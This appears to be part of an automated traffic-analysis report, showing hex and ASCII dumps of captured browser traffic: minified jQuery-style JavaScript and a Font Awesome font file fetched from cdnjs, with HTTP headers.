                                              2023-09-05 23:45:26 UTC423INData Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65
                                              Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b||(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
                                              2023-09-05 23:45:26 UTC439INData Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28
                                              Data Ascii: e&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
                                              2023-09-05 23:45:26 UTC455INData Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63
                                              Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
                                              2023-09-05 23:45:26 UTC471INData Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62
                                              Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h||"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.449736104.17.24.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:27 UTC475OUTGET /ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              Origin: null
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: font
                                              Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:27 UTC477INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:27 GMT
                                              Content-Type: application/octet-stream; charset=utf-8
                                              Content-Length: 77160
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: "5eb03e5f-12d68"
                                              Last-Modified: Mon, 04 May 2020 16:10:07 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 4536980
                                              Expires: Sun, 25 Aug 2024 23:45:27 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b9xdAR6nYawMUoO4qDMLyP6rGaxHfHJj3WJJnqiAHLM9D7oDh7EgfW9BZ3V3oNrpFrngWdtnHmXHqK7fuIoar8ekIlnIJFSD%2Fyhs8YeG8vhSu9lmBoPzjz3i624O7kubD1gzUdYA"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 802258947b6a103a-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2023-09-05 23:45:27 UTC478INData Raw: 77 4f 46 32 00 01 00 00 00 01 2d 68 00 0d 00 00 00 02 86 98 00 01 2d 0e 00 04 01 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 20 06 60 00 85 72 11 08 0a 89 99 28 87 b6 58 01 36 02 24 03 95 70 0b 96 10 00 04 20 05 89 06 07 b4 75 5b 52 09 72 47 61 f7 91 84 2a ba 0d 81 27 ed 3d eb 3a b5 1a 26 d3 cd 3d 72 b7 2a 0a 02 19 e5 1a f1 f6 5d 04 74 07 dc 45 aa 6e a3 b2 ff ff ff ff e4 a4 31 46 db 0e dc 40 e0 d5 f4 fb 7c ad 8a 14 08 66 93 6d 92 60 9b 24 d8 91 a1 40 64 5b 42 51 11 24 28 5b 55 3c 2b 28 ad b8 40 50 d0 35 1e e4 60 81 b0 0e da 3e f6 50 10 1a 3b e1 28 91 d1 31 b3 fd 6c db fe 68 d4 a8 a2 c2 29 9f dc 59 79 94 f2 4a 69 e9 eb 17 ad 85 ce 7c 25 db 81 b7 5e ac 14 47 82 a2 33 b8 12 6e 9e 95 e8 ba da 95 dc 0a c4 cd 90 44 8a 9e
                                              Data Ascii: wOF2-h-?FFTM `r(X6$p u[RrGa*'=:&=r*]tEn1F@|fm`$@d[BQ$([U<+(@P5`>P;(1lh)YyJi|%^G3nD
                                              2023-09-05 23:45:27 UTC478INData Raw: c9 27 8a 0f 36 a3 3a b0 bb c3 f3 73 eb 6d a3 62 8c 31 d8 a8 6d 30 22 c7 82 1a b0 bf 2a 56 8c a8 8d 1e a3 63 a3 24 2c 30 41 54 50 54 b4 31 12 03 fb f4 ac 3c 0b ed 3b ed f3 d2 60 10 e6 b6 27 f1 48 0e 3f f1 73 ce a9 3a 91 0f 4e 44 9f a8 fc a9 10 49 11 a4 24 8c 04 54 14 8b 5b 81 82 62 34 8a 11 cd fc 7f ea ec ef 2c af ce bc d7 ef bd a3 62 6c 36 91 ba 0b 49 4c e9 69 7d db 8c 26 e0 34 e3 94 6d 2c 27 cb 16 cb f3 23 bd d7 a5 b3 7f 52 77 01 a2 62 75 c0 b6 2c 4b 96 0b c6 06 9b e2 76 8b 03 db 08 6d 5f 2d c0 c0 e6 5c 48 8b 9d fb 8e 48 48 fe aa f3 93 ea 07 c6 c2 3f 98 96 d3 6d f3 0b 39 50 88 ad d8 29 39 e7 4a a8 86 24 c6 bd 88 9c e7 b1 f4 38 f8 e8 c7 da ce ce 7e b9 3b c4 72 15 8d 6e bf 3d 24 11 1a b5 1f 94 4e 64 64 6e 1b 21 27 ae a6 f0 e3 3b b3 f4 ac 38 99 bc 27 d9 4e
                                              Data Ascii: '6:smb1m0"*Vc$,0ATPT1<;`'H?s:NDI$T[b4,bl6ILi}&4m,'#Rwbu,Kvm_-\HHH?m9P)9J$8~;rn=$Nddn!';8'N
                                              2023-09-05 23:45:27 UTC479INData Raw: 14 28 65 6c 1c 2b 32 75 2d ee d0 61 d6 98 64 a2 8e 35 3b a2 4e 24 d4 f6 22 a2 48 aa 8f 10 ab 53 46 ba 6f eb 32 69 a8 22 8a d9 5c b3 68 04 37 49 8c f6 a0 3c 53 43 4f 02 ad 19 b8 96 c8 90 48 a0 1e e2 45 77 21 01 2e 1f d7 e9 fd 21 42 53 12 43 aa 67 1e c4 9d 89 63 e3 0e b9 e4 73 2a d5 a7 73 89 28 35 6d 94 3d 71 c6 ca 8a 65 a2 fb f1 59 91 0b 24 eb 5c 3e 10 66 4e 38 80 71 97 8c 78 ea 23 76 0a a5 36 75 6d ef 09 e0 19 9d b0 60 db 4e 4d 2d 4a 00 5c f4 10 46 b7 c7 72 e9 44 02 80 1e b5 5a d3 30 93 07 23 27 ea a5 88 6e ec 11 d2 47 6a 4c 82 da 86 58 14 1b ca 8c a2 41 aa 9d f1 67 59 73 99 2a b2 59 ca dc 07 c7 5e d9 b5 98 3b 22 d8 1d 24 68 62 7f 3d b9 16 19 cf 9b 13 98 30 de 76 48 3c 97 56 76 7f 81 63 9b 5f 00 5c 59 8a 03 ec a3 e8 77 3b 64 42 16 02 83 8b 03 4e 83 84 33
                                              Data Ascii: (el+2u-ad5;N$"HSFo2i"\h7I<SCOHEw!.!BSCgcs*s(5m=qeY$\>fN8qx#v6um`NM-J\FrDZ0#'nGjLXAgYs*Y^;"$hb=0vH<Vvc_\Yw;dBN3
                                              2023-09-05 23:45:27 UTC481INData Raw: fb bb 04 43 3e c0 1e 1e 83 a7 e1 17 78 50 55 ba 7a 1e ad 7d 59 11 3d 02 0f f5 cc 95 16 bc 7d f5 d0 b6 c7 10 9a 19 0a e7 0d 1c 36 2d 60 2f 22 48 0b 0a 6f 85 26 92 44 97 49 30 ff 45 32 58 61 89 95 2d 1f a9 7b 0e 35 c0 81 99 3c 0d 2c 7d 94 d1 13 60 60 36 fa c7 ed 18 90 6a 69 a2 e9 d8 69 6d 3c 55 75 6a 59 a9 5a fa 6a 0e 42 5c 40 8c 67 cb 33 45 6a 66 70 96 f8 98 9f 3a ba da ed ea 10 57 db c7 ae 9f ba d9 df b3 8e 9c 94 ce 70 a5 c4 b3 33 61 6f af fb 11 81 31 88 64 61 8b f8 20 9c 03 b7 dd ab a5 fd 88 99 4a 82 d7 b2 3f 20 6a ce 71 37 ae be 4d c3 e6 ce 66 66 99 59 b5 66 cb 1c d4 73 02 1e b0 1b 24 9b 9c 09 84 95 48 fd 91 14 e6 ac 6c a5 96 f5 b9 bf c0 88 97 28 25 2e 9b 72 06 e3 d2 77 3f 03 f2 be 6d 3d 7e 0b 82 79 b2 63 59 91 62 67 29 3c cb 57 84 20 2f 56 78 16 da 6b
                                              Data Ascii: C>xPUz}Y=}6-`/"Ho&DI0E2Xa-{5<,}``6jiim<UujYZjB\@g3Ejfp:Wp3ao1da J? jq7MffYfs$Hl(%.rw?m=~ycYbg)<W /Vxk
                                              2023-09-05 23:45:27 UTC482INData Raw: 53 92 a4 51 ba 98 74 9e ee 03 36 2c a0 51 e3 6a 5c 08 f0 e3 3c 08 2f 5d 4e ae 73 fb cd 1d a5 3b cd 27 0c 18 48 58 5d 8e 45 98 32 1e 39 90 87 64 a6 6b 59 fd 0d d9 6a 90 8e c2 52 36 d1 d4 ed f7 03 51 12 21 98 ca 00 ea ee f7 20 56 86 bb 99 0a 25 22 08 15 5e d0 60 97 4e 33 4f f2 8c a2 0f fa 86 83 ac 5b f1 1d 76 3a e0 ca 84 3a d9 e8 5e da 9c 72 d7 bf e7 11 40 ea d2 ec 0a 8d 46 c5 5f ae d7 11 e5 01 08 4e 63 cc 42 d2 17 f1 fd c3 38 70 a3 5c 69 af a2 b5 d7 37 cf ee 8b 67 e5 ad 03 2a ee 8f d1 cd fd 2c 83 43 ab 9d 1a c2 0e e1 5b 87 36 b4 54 92 3f ba ba b5 16 85 25 f2 7a fb c5 40 01 06 18 6a 41 70 42 4e 35 f0 9e 22 34 54 9e a5 e0 f4 22 96 7d 30 75 4a f4 87 8f 9e 96 c8 9c 7e 33 f6 1e d9 0e d1 7b 7d 02 75 57 f6 8c e0 ee 4d 93 1e 6a fa 39 c8 2d 82 5d 13 f5 ab 9d 11 99
                                              Data Ascii: SQt6,Qj\</]Ns;'HX]E29dkYjR6Q! V%"^`N3O[v::^r@F_NcB8p\i7g*,C[6T?%z@jApBN5"4T"}0uJ~3{}uWMj9-]
                                              2023-09-05 23:45:27 UTC483INData Raw: 62 72 c7 92 84 81 d7 9d ea ce 5d 11 e5 78 e2 1d 39 3d 52 19 76 26 2a 51 35 e8 80 04 30 7a 7f 1e f3 cb f8 79 3c 88 e0 01 ea 83 60 4d 7c f6 d4 99 9a 64 4f 86 d9 a5 69 5a ae e3 19 c5 24 ae ee 19 bb 2b 23 1e 4b 48 c8 46 0a 8d c3 e9 c4 ea ed be 83 00 a7 8e 09 ee c8 18 f8 89 1f a7 8f 29 2d 09 be 06 3a 4d 24 cb 79 63 a0 ae 45 c0 25 41 69 95 92 05 32 5d 96 98 08 cc 6c e5 b6 a8 90 89 1c 9a 19 cd 38 86 49 1a bc 79 b2 d2 05 5a 17 47 4a b3 83 1a a2 06 ae 5c d5 1e 32 1a d6 99 58 62 18 bf 4c be f6 f0 9f 49 c2 41 2d fd 47 72 52 00 21 cd 30 a0 13 a0 db 4c 2b c0 51 68 aa 53 f3 59 d4 d2 13 d7 f2 53 bf 35 fd 5f 1e d8 28 a5 06 0e 70 6f 46 9a a7 54 89 87 11 af 23 6b 1c 4e db be ea 6c 7c 72 87 6e 06 b3 64 d7 48 a0 07 1e 96 dc 79 13 db 8a e6 f9 ee e4 c8 26 db 86 17 78 e3 70 b0
                                              Data Ascii: br]x9=Rv&*Q50zy<`M|dOiZ$+#KHF)-:M$ycE%Ai2]l8IyZGJ\2XbLIA-GrR!0L+QhSYS5_(poFT#kNl|rndHy&xp
                                              2023-09-05 23:45:27 UTC485INData Raw: 00 af 61 99 39 50 89 ab 26 e0 f8 d1 c5 36 4f 6f be d6 03 17 6c a9 3c 9d d4 f3 e2 02 19 f2 19 ef 64 73 3d 23 01 33 c5 73 16 8f b5 50 2d d0 62 44 a0 d4 fc 22 8d 0f ec 5b 3a b0 77 c9 ba 5e 6a f9 89 d3 81 bb d0 51 65 6a 60 8c 8b 97 54 71 92 05 3d a2 fa b1 94 48 26 a3 6f 8f 1b a1 1b 6b c4 89 4c 44 de 57 a1 4f fb 86 c2 f9 94 eb ca 2a 4a 33 73 5b 19 ce 36 9d 6a 31 f0 40 d9 d8 6e 72 3c ae ce be db 87 86 23 89 cd d2 40 09 88 30 bf 9b 63 06 09 a2 9d 1f 05 99 3f ef b5 9d 3c 32 8a 44 d5 d3 a6 09 bf e8 7d af b0 54 73 cd d9 53 ce fd d0 22 e2 0b 52 cd 0a ae 95 a4 2e 7d df 6f 5a de cd 18 e3 87 f9 46 6f 2a 98 95 a7 dd 97 87 b6 ff b7 96 b5 3a dd f4 d6 1b c1 93 bc c1 37 c9 ed f7 48 c2 f2 e4 8d 9a 0e a5 78 a1 b4 5d c5 db c7 61 19 36 1e 76 35 ed 12 52 fd a0 cc be 65 31 87 ed
                                              Data Ascii: a9P&6Ool<ds=#3sP-bD"[:w^jQej`Tq=H&okLDWO*J3s[6j1@nr<#@0c?<2D}TsS"R.}oZFo*:7Hx]a6v5Re1
                                              2023-09-05 23:45:27 UTC486INData Raw: 31 80 2d 82 59 99 97 50 c7 4e c2 bf 00 8a 5c 26 b9 79 4c 38 af d3 b9 cd f7 89 26 30 cb 63 92 c1 76 08 14 f0 c6 89 5c 8e c0 8a a1 f2 4a b5 41 ca cd 3b a4 f2 51 3b 1c 95 5d 85 89 fd 49 b4 4d 38 09 d9 73 af 02 aa d8 14 4d 66 f4 3f d4 b0 07 1c a1 49 12 18 9a b2 72 1b bb 72 21 d2 4b 86 39 d1 8f 38 70 d9 7d 51 bf ec bd 8d 8b e7 67 fb 2d 84 2a 0f 73 6d b5 7e c5 58 06 d7 50 1a 30 64 f8 4d 5e 08 b5 f0 3f 44 c5 18 64 49 82 6d 3c 86 a8 70 3b a1 7f 06 79 8e 06 2c 22 db a6 a6 36 ad e4 76 ca 70 07 54 5c 5e ca 6e f4 db f7 be 7f 05 33 6d a4 3e 38 a4 65 43 ae f1 dc 4e 7d 10 ad cd ea ed 63 c3 a0 e6 d9 ad 24 73 37 db bc 13 fa 9c 23 d5 b5 3c 53 46 2d 41 ba a7 a0 14 e4 86 f9 7a ac d2 e2 89 b1 13 cf 0a 80 42 81 09 2a 7b b8 06 36 63 67 1d 89 87 b1 54 7a ad 47 07 58 1f 32 2b 93
                                              Data Ascii: 1-YPN\&yL8&0cv\JA;Q;]IM8sMf?Irr!K98p}Qg-*sm~XP0dM^?DdIm<p;y,"6vpT\^n3m>8eCN}c$s7#<SF-AzB*{6cgTzGX2+
                                              2023-09-05 23:45:27 UTC487INData Raw: 87 51 bc 9c 30 bf e5 fe d4 a5 ed 55 bf c9 75 29 4d b6 dd 5b c6 5a 60 22 9f 37 0d b9 e2 1a 0e 3f 2f 5b 43 e4 7b cc 6c f1 82 29 f2 24 18 4d 72 89 f5 c0 9a 7c 5e ba 04 91 09 61 99 bb e2 b7 10 03 fe a7 3a 88 a0 cd 22 e9 d6 8a 9d db 61 09 c2 6c 02 f2 3e 1b de 68 00 c7 e1 79 a2 7f 80 14 61 d1 ce 7b 9e 32 3e af fe 43 50 ae 89 90 b0 4c c5 0f 10 20 9a 6a 3f d1 6e 08 74 67 e5 9e d8 d3 5d 03 a6 16 e1 53 88 b8 f8 f8 7b e1 b5 55 d3 87 05 91 28 27 b3 b5 62 e7 a3 27 66 8f e6 67 30 d3 83 dd ea 18 95 c4 4c 50 41 a5 4d 74 64 15 07 cc 29 e3 b3 32 c3 ba e3 59 21 d6 76 00 8e 26 60 6f 85 af fe 32 12 50 5b 0b 1b 9d 61 de 94 84 bb 35 fb c0 0c 53 87 7c 23 2b 80 b2 01 37 4a 05 a4 8a 0a 23 1b c8 b8 cc 5f ab d5 64 55 a9 a4 36 23 56 19 44 ae 86 c0 9b 42 22 4b 83 f7 d6 7c a2 1a b8 c0
                                              Data Ascii: Q0Uu)M[Z`"7?/[C{l)$Mr|^a:"al>hya{2>CPL j?ntg]S{U('b'fg0LPAMtd)2Y!v&`o2P[a5S|#+7J#_dU6#VDB"K|
                                              2023-09-05 23:45:27 UTC489INData Raw: ea f8 c8 84 36 e6 90 4e ce 81 84 aa 9e 41 7d 6a c0 8e 42 61 f3 c1 1c 33 ed c5 a5 29 ea 15 c3 cf cb b4 3a 71 ba 49 ab 00 ed af 9e c1 1d 67 5a be 08 32 cf 76 1a 6c 66 2c df 10 d0 a3 a2 ce 7f 59 bf f3 87 d1 ae ec dd 62 d4 a9 ea 1c f9 9e 19 d9 58 6f c3 49 12 c4 97 cb 9c dd 58 a8 81 a2 0e 5f 27 01 c4 12 f2 c3 35 f5 c7 15 5d 1a 4a 84 b8 fc 32 50 d2 08 39 32 b0 a8 43 cd 89 fa d4 ff 0c fd 40 f1 99 a6 43 a5 a0 86 f9 9b 18 36 14 45 9f 65 d1 00 42 40 8b 0b 06 e8 ac df 41 91 39 94 df 87 c3 02 e7 e6 c7 b4 e8 79 06 5d 00 f5 05 48 f1 09 07 89 03 2d 1c e0 20 db 62 b6 a8 39 0d d1 f0 4f 1e f5 19 30 0c 75 77 a7 ac 49 e2 c8 f1 a6 02 37 4a a6 78 95 c5 ab 32 af f3 5c ca 19 56 66 3d 6e 56 91 56 80 ab a4 d0 22 23 39 93 ac d6 76 38 78 0a fb b6 6d 15 0f 14 70 41 68 f6 d3 13 e8 79
                                              Data Ascii: 6NA}jBa3):qIgZ2vlf,YbXoIX_'5]J2P92C@C6EeB@A9y]H- b9O0uwI7Jx2\Vf=nVV"#9v8xmpAhy
                                              2023-09-05 23:45:27 UTC490INData Raw: a6 e8 ce dd c0 8c 8b f8 27 e4 72 c2 fc 19 a5 4b 0a 80 9b 7a 8e 6f 20 6c d6 a2 3c ba 9e d5 4e 6c b2 8c 9d 10 66 a8 a7 4d 7f 2a cc 7e d0 55 ca 8f 87 57 f3 da 5f 9f 04 3f 07 96 76 1e 3b 28 41 80 19 85 a8 cd ba da 52 c3 5e ff 20 33 b7 3d 36 d2 36 3d 32 e6 6e eb 7e 7d 63 af bd 15 07 90 4f 37 93 58 0c 86 95 e0 64 ba ac 01 4a 19 d6 7c 8f de 4c 50 9c de 9d 7e 0f cd 85 a9 fa f1 38 9a 2b 51 44 ec f4 e0 5c af d4 e6 d2 ad 0b c3 ad 53 c3 17 5c a7 3d f7 55 d9 76 cc 0d 4d e4 85 9a 1e 63 22 61 fb ab 4b 3b cf 41 ae 1c 16 3d d4 a8 c4 9a a9 94 b9 d6 6b 81 01 4a 84 4e 80 70 9b e8 4d 25 41 52 60 d1 d9 88 3b d8 f9 28 13 fb bd 87 35 c3 10 57 9a bd db 3d b5 08 8b 86 59 20 9d 67 2d e4 5e 08 76 34 81 d0 58 7f ae d9 89 fa 85 4a d8 40 ee d7 3d f8 63 c7 33 c5 ea fc ec 7d ca 2a 29 12
                                              Data Ascii: 'rKzo l<NlfM*~UW_?v;(AR^ 3=66=2n~}cO7XdJ|LP~8+QD\S\=UvMc"aK;A=kJNpM%AR`;(5W=Y g-^v4XJ@=c3}*)
                                              2023-09-05 23:45:27 UTC491INData Raw: e7 f6 42 45 18 37 35 5e 5e 87 a4 03 61 34 07 da 04 c5 77 55 a9 ed 4b cb 27 67 3f 67 65 93 7f c8 df 13 32 31 33 ce e6 e7 b8 cc c7 b8 9b 6f 60 d4 d7 6c 4b 7a 50 36 5e 97 20 88 24 f7 24 39 4e 8a 90 14 8b 57 76 67 32 f9 48 02 cf 8f 93 af e6 43 52 ef df 9c 61 37 46 0e a1 2f e3 b9 f1 33 f1 5c 38 ad fb ad 46 84 5c b9 2f 7a 0c 50 cc ef 2f 3f fd bd ec 1e e8 07 ee a7 e9 f5 7b 78 d6 e3 d3 bc f7 5d af 0f b3 be bb 00 f9 89 eb 17 2f b4 17 5e 39 fa 40 37 63 a3 7f de a5 0e 1a 47 1b 3c 48 17 6f 7e 97 46 8a f2 21 cc 36 94 3a 86 6a 99 2a 9a af 4e 62 da 6c 4e 79 ba 89 d7 c3 43 c4 63 47 a1 dc 64 32 5b 64 37 86 57 34 5d d3 0a d1 35 c0 34 69 cd 32 a9 a6 c1 2a 1a 80 dd 68 d1 ef fb 70 b9 1c 2a 82 1d 1e 39 db ce d6 f9 6d 59 6d d8 b7 8a 1e b7 6b 68 22 12 c9 8b c5 8a a3 57 de 0b 21
                                              Data Ascii: BE75^^a4wUK'g?ge213o`lKzP6^ $$9NWvg2HCRa7F/3\8F\/zP/?{x]/^9@7cG<Ho~F!6:j*NblNyCcGd2[d7W4]54i2*hp*9mYmkh"W!
                                              2023-09-05 23:45:27 UTC493INData Raw: 83 47 88 1c 47 87 62 65 56 a6 77 a2 69 24 43 be 4f 31 f4 f8 10 20 90 d0 db 63 e7 5a dc 5a ec 3c 47 63 3c 7a ac fe 40 b1 3a 03 ab 4a 2d c0 d5 c4 df 5f 60 e8 a9 03 38 80 a1 99 7e 0e 80 da 86 88 0c e4 4d 16 8a 09 a7 a9 03 e8 29 0d 75 45 8d b4 b3 91 02 73 59 31 f2 8d 8c 42 b5 a3 37 16 d7 34 77 df 30 eb 47 97 d3 35 89 c1 7a 8d c2 05 41 30 1f ef 7c d0 a0 96 9f 5b a7 e4 40 9c c4 56 f7 cf dc 9f ec fd 9f 51 cd 16 71 5e 40 57 01 9c 72 2d 8e fd d2 55 8c 9e 4f ed b7 03 d9 fe c5 24 39 27 e7 c8 49 42 6a 66 60 35 0d 9b 22 14 d1 a6 0e 59 78 c8 f8 5a ef f4 20 81 55 ee 4f 2f 26 38 33 df dc 2c c8 38 ce 0e 6b ac 32 e2 fa 1e 26 a7 be 20 27 99 3f 9a 65 45 76 87 24 ce 19 d5 4c 60 8f 42 10 89 25 b6 3d b3 54 87 bd 66 74 46 35 e5 af be 38 91 2e c5 cf 1b bf 3c 31 3d 3e 8e 30 cb 47
                                              Data Ascii: GGbeVwi$CO1 cZZ<Gc<z@:J-_`8~M)uEsY1B74w0G5zA0|[@VQq^@Wr-UO$9'IBjf`5"YxZ UO/&83,8k2& '?eEv$L`B%=TftF58.<1=>0G
                                              2023-09-05 23:45:27 UTC494INData Raw: 0c 4b f4 f5 75 76 dc 5c a6 cf 58 e7 b5 2b 98 9f f2 0c 76 08 6a 13 85 e0 b6 02 5e 34 3d de cf 30 33 4f 93 83 28 e0 e9 fa be da 30 2d 49 87 8d 66 4b d1 f5 52 a0 11 c8 c7 6f b0 9b 82 4f a8 bc cd 69 e3 32 13 06 c2 29 d8 86 07 14 b3 47 f2 c7 9e 0a 58 3c d1 12 c7 98 65 c7 6c e7 ea 1a 6d a3 c5 53 cd 5c a0 e7 f6 87 50 cc dc 21 21 fa 6f 78 ee 24 c3 2b 0c 17 89 08 83 04 3e 64 6c ed c5 e0 2b 8c e7 9d 62 8a 9b 10 e1 4e 49 4d 03 16 c3 64 54 22 2b 18 0e 82 c6 8c b9 b0 18 6f 30 ed c5 60 c4 18 38 39 c1 fe d7 cf fc 5c 7c 35 20 de a3 f4 bb d8 a6 28 c7 fa 93 a0 8b 92 d8 79 0b f1 6a a5 71 94 19 6d 28 b2 ec f7 80 e6 d3 3c 5c 47 91 09 15 de 32 d7 07 e9 f1 64 54 9e 18 f3 50 9c 97 30 af f4 e8 24 88 a7 b6 6e cf e5 1f 40 a1 0a 02 c4 92 21 01 d7 58 0c bf e3 ba 95 9f 96 96 1c 8d d3
                                              Data Ascii: Kuv\X+vj^4=03O(0-IfKRoOi2)GX<elmS\P!!ox$+>dl+bNIMdT"+o0`89\|5 (yjqm(<\G2dTP0$n@!X
